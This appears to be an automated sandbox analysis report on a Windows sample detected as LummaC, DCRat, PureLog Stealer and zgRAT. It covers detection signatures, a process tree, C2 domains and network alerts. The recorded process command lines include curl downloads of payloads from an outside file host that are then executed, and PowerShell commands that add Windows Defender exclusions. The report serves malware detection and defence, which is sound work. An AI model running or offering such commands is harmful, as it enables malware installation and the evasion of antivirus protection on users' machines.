Edit tour
Windows
Analysis Report
seoI30IZZr.exe
Overview
General Information
Sample name: | seoI30IZZr.exerenamed because original name is a hash value |
Original sample name: | 26406c587a518c9b6ab8fd95252cbb347b853f9f5fd0f2b287f8bcd2d9905e34.exe |
Analysis ID: | 1522824 |
MD5: | d0e53e2a0bef6c93e0ccad47a650079d |
SHA1: | 8e69fc482c058749cc7974e94ad7d571fca6ccf2 |
SHA256: | 26406c587a518c9b6ab8fd95252cbb347b853f9f5fd0f2b287f8bcd2d9905e34 |
Tags: | exezelensky-topuser-JAMESWT_MHT |
Infos: | |
Detection
LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected LummaC Stealer
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to inject code into remote processes
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious execution chain found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to resolve many domain names, but no domain seems valid
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Electron Application Child Processes
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Classification
- System is w10x64
- seoI30IZZr.exe (PID: 4780 cmdline:
"C:\Users\ user\Deskt op\seoI30I ZZr.exe" MD5: D0E53E2A0BEF6C93E0CCAD47A650079D) - conhost.exe (PID: 5660 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 3456 cmdline:
C:\Windows \system32\ cmd.exe /c curl --si lent https ://file.ga rden/ZmE_z iOgiFXI9Y4 8/kdmapper .bin --out put C:\Win dows\Speec h\kdmapper .exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - curl.exe (PID: 3832 cmdline:
curl --sil ent https: //file.gar den/ZmE_zi OgiFXI9Y48 /kdmapper. bin --outp ut C:\Wind ows\Speech \kdmapper. exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1) - kdmapper.exe (PID: 2616 cmdline:
"C:\Window s\Speech\k dmapper.ex e" MD5: C85ABE0E8C3C4D4C5044AEF6422B8218) - wscript.exe (PID: 5480 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Ed ge\L6lFlVn d0szYUYb26 bZc.vbe" MD5: FF00E0480075B095948000BDC66E81F0) - cmd.exe (PID: 6496 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\Edge \mikZxAokT 1te3xOwV8i iWp5ACQVlw zi0DAV4VCg jFc4vhg.ba t" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5472 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - msedge.exe (PID: 4900 cmdline:
"C:\Edge/m sedge.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C) - csc.exe (PID: 4200 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\lar3wz dd\lar3wzd d.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66) - csc.exe (PID: 5072 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\iikyx5 5j\iikyx55 j.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66) - powershell.exe (PID: 3848 cmdline:
"powershel l" -Comman d Add-MpPr eference - ExclusionP ath 'C:\Us ers\user\A ppData\Loc al\WmiPrvS E.exe' MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 5056 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WmiPrvSE.exe (PID: 2736 cmdline:
C:\Windows \system32\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51) - powershell.exe (PID: 6864 cmdline:
"powershel l" -Comman d Add-MpPr eference - ExclusionP ath 'C:\Ed ge\msedge. exe' MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 4496 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7160 cmdline:
"C:\Window s\System32 \cmd.exe" /C "C:\Use rs\user\Ap pData\Loca l\Temp\FVb PldJoKd.ba t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4620 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chcp.com (PID: 5992 cmdline:
chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32) - PING.EXE (PID: 3148 cmdline:
ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D) - WmiPrvSE.exe (PID: 5656 cmdline:
"C:\Users\ user\AppDa ta\Local\W miPrvSE.ex e" MD5: ABD343DF6FBD7334D617F76F6F050E3C) - conhost.exe (PID: 5212 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 4200 cmdline:
C:\Windows \system32\ cmd.exe /c curl --si lent https ://file.ga rden/ZmE_z iOgiFXI9Y4 8/physmeme .bin --out put C:\Win dows\Speec h\physmeme .exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - curl.exe (PID: 4424 cmdline:
curl --sil ent https: //file.gar den/ZmE_zi OgiFXI9Y48 /physmeme. bin --outp ut C:\Wind ows\Speech \physmeme. exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1) - conhost.exe (PID: 5640 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cvtres.exe (PID: 1288 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES8FC0.tm p" "c:\Pro gram Files (x86)\Mic rosoft\Edg e\Applicat ion\CSC1C2 02AE046574 26D812F38F 5265327B.T MP" MD5: C877CBB966EA5939AA2A17B6A5160950) - physmeme.exe (PID: 5064 cmdline:
"C:\Window s\Speech\p hysmeme.ex e" MD5: D6EDF37D68DA356237AE14270B3C7A1A) - conhost.exe (PID: 708 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - RegAsm.exe (PID: 5072 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Asm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13) - conhost.exe (PID: 6104 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cvtres.exe (PID: 5992 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES9270.tm p" "c:\Win dows\Syste m32\CSC90D D46E6AB146 EBB2673718 B916635.TM P" MD5: C877CBB966EA5939AA2A17B6A5160950) - RegAsm.exe (PID: 3724 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Asm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
- msedge.exe (PID: 1856 cmdline:
C:\Edge\ms edge.exe MD5: ABD343DF6FBD7334D617F76F6F050E3C)
- msedge.exe (PID: 7140 cmdline:
C:\Edge\ms edge.exe MD5: ABD343DF6FBD7334D617F76F6F050E3C)
- cmd.exe (PID: 6732 cmdline:
"C:\Window s\System32 \cmd.exe" /C "C:\Use rs\user\Ap pData\Loca l\Temp\xPf Nd2AH1w.ba t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3552 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chcp.com (PID: 4568 cmdline:
chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32) - PING.EXE (PID: 4024 cmdline:
ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D) - WmiPrvSE.exe (PID: 3484 cmdline:
"C:\Users\ user\AppDa ta\Local\W miPrvSE.ex e" MD5: ABD343DF6FBD7334D617F76F6F050E3C)
- msedge.exe (PID: 1836 cmdline:
"C:\Edge\m sedge.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C) - cmd.exe (PID: 7156 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Local \Temp\qgs8 WdcQ4J.bat " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4676 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chcp.com (PID: 5308 cmdline:
chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32) - PING.EXE (PID: 7060 cmdline:
ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
- cmd.exe (PID: 6264 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Local \Temp\Jcyd u7dUmM.bat " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5864 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chcp.com (PID: 6280 cmdline:
chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
DCRat | DCRat is a typical RAT that has been around since at least June 2019. | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
zgRAT | zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on. | No Attribution |
{"C2 url": ["coursedonnyre.shop", "appleboltelwk.shop", "tiddymarktwo.shop", "surveriysiop.shop", "strappystyio.shop", "captainynfanw.shop", "tearrybyiwo.shop", "tendencerangej.shop", "fossillargeiw.shop"], "Build id": "1AsNN2--5899070203"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | ||
Click to see the 1 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security | ||
JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security | ||
Click to see the 2 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | ||
Click to see the 5 entries |
System Summary |
---|
Source: | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Data Obfuscation |
---|
Source: | Author: Joe Security: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-09-30T18:19:16.819790+0200 | 2056036 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 50741 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-09-30T18:19:16.793557+0200 | 2056040 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 55461 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-09-30T18:19:16.858485+0200 | 2056042 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 50670 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-09-30T18:19:16.845073+0200 | 2056046 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 55758 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-09-30T18:19:16.869633+0200 | 2056052 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 59161 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-09-30T18:19:16.780192+0200 | 2056054 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 58540 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-09-30T18:19:16.808005+0200 | 2056056 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 53563 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-09-30T18:19:16.832660+0200 | 2056058 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 61329 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-09-30T18:19:16.762080+0200 | 2056172 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 55029 | 1.1.1.1 | 53 | UDP |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira: |
Source: | URL Reputation: |
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: |
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: |
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: |
Source: | Joe Sandbox ML: |
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Spreading |
---|
Source: | System file written: | ||
Source: | System file written: |
Source: | Code function: | 0_2_00007FF78662DB3C | |
Source: | Code function: | 5_2_0060A69B | |
Source: | Code function: | 5_2_0061C220 | |
Source: | Code function: | 5_2_0062B348 |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Software Vulnerabilities |
---|
Source: | Child: |
Source: | Code function: | 12_2_0040F7B0 | |
Source: | Code function: | 12_2_0041407F | |
Source: | Code function: | 12_2_0041407F | |
Source: | Code function: | 12_2_00414031 | |
Source: | Code function: | 12_2_0042D150 | |
Source: | Code function: | 12_2_0043F150 | |
Source: | Code function: | 12_2_00407170 | |
Source: | Code function: | 12_2_00441100 | |
Source: | Code function: | 12_2_0044A1E0 | |
Source: | Code function: | 12_2_0041F193 | |
Source: | Code function: | 12_2_0041F193 | |
Source: | Code function: | 12_2_00416361 | |
Source: | Code function: | 12_2_00416361 | |
Source: | Code function: | 12_2_0044A360 | |
Source: | Code function: | 12_2_0042D3CC | |
Source: | Code function: | 12_2_004473FA | |
Source: | Code function: | 12_2_00424390 | |
Source: | Code function: | 12_2_004283A5 | |
Source: | Code function: | 12_2_004303B0 | |
Source: | Code function: | 12_2_0043F479 | |
Source: | Code function: | 12_2_0042F40F | |
Source: | Code function: | 12_2_00443420 | |
Source: | Code function: | 12_2_0044A4D0 | |
Source: | Code function: | 12_2_0040A4E0 | |
Source: | Code function: | 12_2_0040A4E0 | |
Source: | Code function: | 12_2_0042B490 | |
Source: | Code function: | 12_2_0044A5E0 | |
Source: | Code function: | 12_2_00412653 | |
Source: | Code function: | 12_2_004206E0 | |
Source: | Code function: | 12_2_00443870 | |
Source: | Code function: | 12_2_0043F8C0 | |
Source: | Code function: | 12_2_0043F8C0 | |
Source: | Code function: | 12_2_0043A880 | |
Source: | Code function: | 12_2_0044A8B0 | |
Source: | Code function: | 12_2_004468B9 | |
Source: | Code function: | 12_2_00412653 | |
Source: | Code function: | 12_2_00426910 | |
Source: | Code function: | 12_2_004449F0 | |
Source: | Code function: | 12_2_0041399C | |
Source: | Code function: | 12_2_0041399C | |
Source: | Code function: | 12_2_004499B0 | |
Source: | Code function: | 12_2_0043EA30 | |
Source: | Code function: | 12_2_00415ADF | |
Source: | Code function: | 12_2_0041DAA0 | |
Source: | Code function: | 12_2_0041DAA0 | |
Source: | Code function: | 12_2_0040DAB0 | |
Source: | Code function: | 12_2_00426B80 | |
Source: | Code function: | 12_2_0042BC50 | |
Source: | Code function: | 12_2_0042BC50 | |
Source: | Code function: | 12_2_00449C10 | |
Source: | Code function: | 12_2_00413CC6 | |
Source: | Code function: | 12_2_00412653 | |
Source: | Code function: | 12_2_0042CCDD | |
Source: | Code function: | 12_2_0042CCF5 | |
Source: | Code function: | 12_2_00428C90 | |
Source: | Code function: | 12_2_00404CB0 | |
Source: | Code function: | 12_2_0042ED6D | |
Source: | Code function: | 12_2_0042ED6D | |
Source: | Code function: | 12_2_00405D10 | |
Source: | Code function: | 12_2_00431E00 | |
Source: | Code function: | 12_2_00431E00 | |
Source: | Code function: | 12_2_00431E00 | |
Source: | Code function: | 12_2_00431E00 | |
Source: | Code function: | 12_2_00431E00 | |
Source: | Code function: | 12_2_00431E00 | |
Source: | Code function: | 12_2_00431E00 | |
Source: | Code function: | 12_2_00431E00 | |
Source: | Code function: | 12_2_00431E00 | |
Source: | Code function: | 12_2_00447E30 | |
Source: | Code function: | 12_2_00447E30 | |
Source: | Code function: | 12_2_00415EF6 | |
Source: | Code function: | 12_2_00415EF6 | |
Source: | Code function: | 12_2_0041AF50 | |
Source: | Code function: | 12_2_00410F0F | |
Source: | Code function: | 12_2_0042DFD6 | |
Source: | Code function: | 12_2_00443FA0 |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | Process created: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: |
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
